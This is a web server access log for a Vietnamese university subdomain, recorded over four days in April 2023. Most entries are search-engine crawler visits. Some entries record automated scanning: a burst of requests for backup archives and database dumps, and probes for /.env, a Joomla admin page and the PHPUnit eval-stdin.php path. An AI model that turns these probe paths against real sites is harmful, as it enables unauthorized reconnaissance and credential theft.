143.92.61.19 - - [09/Apr/2023:18:09:42 +0700] "HEAD /data.sql HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/data.sql" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:42 +0700] "HEAD /web.zip HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/web.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:42 +0700] "HEAD /web.rar HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/web.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:43 +0700] "HEAD /web.tar.gz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/web.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:43 +0700] "HEAD /web.tgz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/web.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:43 +0700] "HEAD /web.sql HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/web.sql" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:43 +0700] "HEAD /wwwroot.zip HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/wwwroot.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:43 +0700] "HEAD /wwwroot.rar HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/wwwroot.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:43 +0700] "HEAD /wwwroot.tar.gz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/wwwroot.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:43 +0700] "HEAD /wwwroot.tgz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/wwwroot.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:43 +0700] "HEAD /wwwroot.sql HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/wwwroot.sql" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:43 +0700] "HEAD /database.zip HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/database.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:43 +0700] "HEAD /database.rar HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/database.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:43 +0700] "HEAD /database.tar.gz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/database.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:43 +0700] "HEAD /database.tgz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/database.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:43 +0700] "HEAD /database.sql HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/database.sql" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:43 +0700] "HEAD /www.zip HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/www.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:43 +0700] "HEAD /www.rar HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/www.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:43 +0700] "HEAD /www.tar.gz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/www.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:44 +0700] "HEAD /www.tgz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/www.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:44 +0700] "HEAD /www.sql HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/www.sql" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:44 +0700] "HEAD /code.zip HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/code.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:44 +0700] "HEAD /code.rar HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/code.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:44 +0700] "HEAD /code.tar.gz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/code.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:44 +0700] "HEAD /code.tgz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/code.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:44 +0700] "HEAD /code.sql HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/code.sql" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:44 +0700] "HEAD /test.zip HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/test.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:44 +0700] "HEAD /test.rar HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/test.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:44 +0700] "HEAD /test.tar.gz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/test.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:44 +0700] "HEAD /test.tgz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/test.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:44 +0700] "HEAD /test.sql HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/test.sql" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:44 +0700] "HEAD /admin.zip HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/admin.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:44 +0700] "HEAD /admin.rar HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/admin.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:44 +0700] "HEAD /admin.tar.gz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/admin.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:44 +0700] "HEAD /admin.tgz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/admin.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:44 +0700] "HEAD /admin.sql HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/admin.sql" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:45 +0700] "HEAD /user.zip HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/user.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:45 +0700] "HEAD /user.rar HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/user.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:45 +0700] "HEAD /user.tar.gz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/user.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:45 +0700] "HEAD /user.tgz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/user.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:45 +0700] "HEAD /user.sql HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/user.sql" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:45 +0700] "HEAD /sql.zip HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/sql.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:45 +0700] "HEAD /sql.rar HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/sql.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:45 +0700] "HEAD /sql.tar.gz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/sql.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:45 +0700] "HEAD /sql.tgz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/sql.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:45 +0700] "HEAD /sql.sql HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/sql.sql" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:45 +0700] "HEAD /vanlanguni.zip HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/vanlanguni.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:45 +0700] "HEAD /vanlanguni.edu.vn.zip HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/vanlanguni.edu.vn.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:45 +0700] "HEAD /xaydung.vanlanguni.edu.vn.zip HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/xaydung.vanlanguni.edu.vn.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:45 +0700] "HEAD /vanlanguni.rar HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/vanlanguni.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:45 +0700] "HEAD /vanlanguni.edu.vn.rar HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/vanlanguni.edu.vn.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:46 +0700] "HEAD /xaydung.vanlanguni.edu.vn.rar HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/xaydung.vanlanguni.edu.vn.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:46 +0700] "HEAD /vanlanguni.tar.gz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/vanlanguni.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:46 +0700] "HEAD /vanlanguni.edu.vn.tar.gz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/vanlanguni.edu.vn.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:46 +0700] "HEAD /xaydung.vanlanguni.edu.vn.tar.gz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/xaydung.vanlanguni.edu.vn.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:46 +0700] "HEAD /vanlanguni.tgz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/vanlanguni.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:46 +0700] "HEAD /vanlanguni.edu.vn.tgz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/vanlanguni.edu.vn.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:46 +0700] "HEAD /xaydung.vanlanguni.edu.vn.tgz HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/xaydung.vanlanguni.edu.vn.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:46 +0700] "HEAD /vanlanguni.sql HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/vanlanguni.sql" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:46 +0700] "HEAD /vanlanguni.edu.vn.sql HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/vanlanguni.edu.vn.sql" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
143.92.61.19 - - [09/Apr/2023:18:09:46 +0700] "HEAD /xaydung.vanlanguni.edu.vn.sql HTTP/1.1" 302 - "http://xaydung.vanlanguni.edu.vn/xaydung.vanlanguni.edu.vn.sql" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
66.249.71.212 - - [09/Apr/2023:19:25:12 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.146 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.235.24.184 - - [09/Apr/2023:22:45:07 +0700] "GET / HTTP/1.1" 302 217 "-" "-"
66.249.68.21 - - [09/Apr/2023:23:03:57 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.150 - - [09/Apr/2023:23:03:58 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.222 - - [10/Apr/2023:02:04:39 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
66.249.71.146 - - [10/Apr/2023:07:28:05 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.146 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.18 - - [10/Apr/2023:09:25:34 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
66.249.68.25 - - [10/Apr/2023:09:40:05 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.146 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.21 - - [10/Apr/2023:09:40:16 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.146 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.17 - - [10/Apr/2023:19:21:05 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.178 - - [10/Apr/2023:19:21:27 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.146 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.231 - - [10/Apr/2023:20:56:12 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
66.249.68.21 - - [10/Apr/2023:23:04:01 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.25 - - [10/Apr/2023:23:45:06 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.36 - - [11/Apr/2023:03:22:53 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.80 - - [11/Apr/2023:04:38:03 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
66.249.68.17 - - [11/Apr/2023:06:09:28 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.146 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
5.188.86.231 - - [11/Apr/2023:11:33:58 +0700] "GET /administrator/index.php HTTP/1.1" 302 240 "-" "python-requests/2.23.0"
103.131.71.20 - - [11/Apr/2023:13:55:10 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
66.249.68.21 - - [11/Apr/2023:15:59:26 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.21 - - [11/Apr/2023:15:59:27 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.146 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.180 - - [11/Apr/2023:23:04:06 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.230 - - [12/Apr/2023:10:04:15 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
66.249.71.182 - - [12/Apr/2023:10:10:50 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.180 - - [12/Apr/2023:10:11:12 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.146 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.212 - - [12/Apr/2023:10:11:14 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.146 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.25 - - [12/Apr/2023:10:55:24 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.146 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.17 - - [12/Apr/2023:10:55:42 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.146 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.210 - - [12/Apr/2023:13:24:23 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.146 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.214 - - [12/Apr/2023:13:24:23 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.146 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
52.25.14.4 - - [12/Apr/2023:14:14:17 +0700] "POST / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.25.14.4 - - [12/Apr/2023:14:14:35 +0700] "GET /.env HTTP/1.1" 302 221 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.25.14.4 - - [12/Apr/2023:14:14:40 +0700] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 400 608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
66.249.68.25 - - [12/Apr/2023:16:20:51 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.146 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.37 - - [12/Apr/2023:22:06:17 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
136.244.95.237 - - [12/Apr/2023:22:36:58 +0700] "GET / HTTP/1.1" 302 217 "-" "Go-http-client/1.1"
136.244.95.237 - - [12/Apr/2023:22:37:00 +0700] "GET /media/jui/js/jquery.min.js?ea6d93f2e1af77751c9890f39684a4d1 HTTP/1.1" 302 276 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
136.244.95.237 - - [12/Apr/2023:22:37:01 +0700] "GET /media/jui/js/jquery-noconflict.js?ea6d93f2e1af77751c9890f39684a4d1 HTTP/1.1" 302 283 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
136.244.95.237 - - [12/Apr/2023:22:37:01 +0700] "GET /media/jui/js/jquery-migrate.min.js?ea6d93f2e1af77751c9890f39684a4d1 HTTP/1.1" 302 284 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
136.244.95.237 - - [12/Apr/2023:22:37:02 +0700] "GET /components/com_sppagebuilder/assets/js/jquery.parallax.js?5029e51e66aaf58bae66a64ddc4a848b HTTP/1.1" 302 307 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
136.244.95.237 - - [12/Apr/2023:22:37:02 +0700] "GET /components/com_sppagebuilder/assets/js/sppagebuilder.js?5029e51e66aaf58bae66a64ddc4a848b HTTP/1.1" 302 305 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
136.244.95.237 - - [12/Apr/2023:22:37:03 +0700] "GET /modules/mod_ap_smart_layerslider/assets/js/jquery.sliderPro.packed.js HTTP/1.1" 302 286 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
136.244.95.237 - - [12/Apr/2023:22:37:03 +0700] "GET /templates/flex/js/bootstrap.min.js HTTP/1.1" 302 251 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
136.244.95.237 - - [12/Apr/2023:22:37:03 +0700] "GET /templates/flex/js/SmoothScroll-1.4.9.js HTTP/1.1" 302 256 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
136.244.95.237 - - [12/Apr/2023:22:37:04 +0700] "GET /templates/flex/js/jquery.easing.min.js HTTP/1.1" 302 255 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
136.244.95.237 - - [12/Apr/2023:22:37:04 +0700] "GET /templates/flex/js/main.js HTTP/1.1" 302 242 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
136.244.95.237 - - [12/Apr/2023:22:37:04 +0700] "GET /plugins/system/spcookieconsent/assets/js/script.js HTTP/1.1" 302 267 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
136.244.95.237 - - [12/Apr/2023:22:37:05 +0700] "GET /media/com_acym/js/module.min.js?v=6110 HTTP/1.1" 302 255 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
136.244.95.237 - - [12/Apr/2023:22:37:05 +0700] "GET /media/system/js/core.js?ea6d93f2e1af77751c9890f39684a4d1 HTTP/1.1" 302 273 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
136.244.95.237 - - [12/Apr/2023:22:37:06 +0700] "GET /sitemap.xml HTTP/1.1" 302 228 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
136.244.95.237 - - [12/Apr/2023:22:37:06 +0700] "GET /crossdomain.xml HTTP/1.1" 302 232 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
66.249.71.210 - - [12/Apr/2023:23:04:10 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.180 - - [12/Apr/2023:23:04:10 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.180 - - [12/Apr/2023:23:42:01 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.146 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
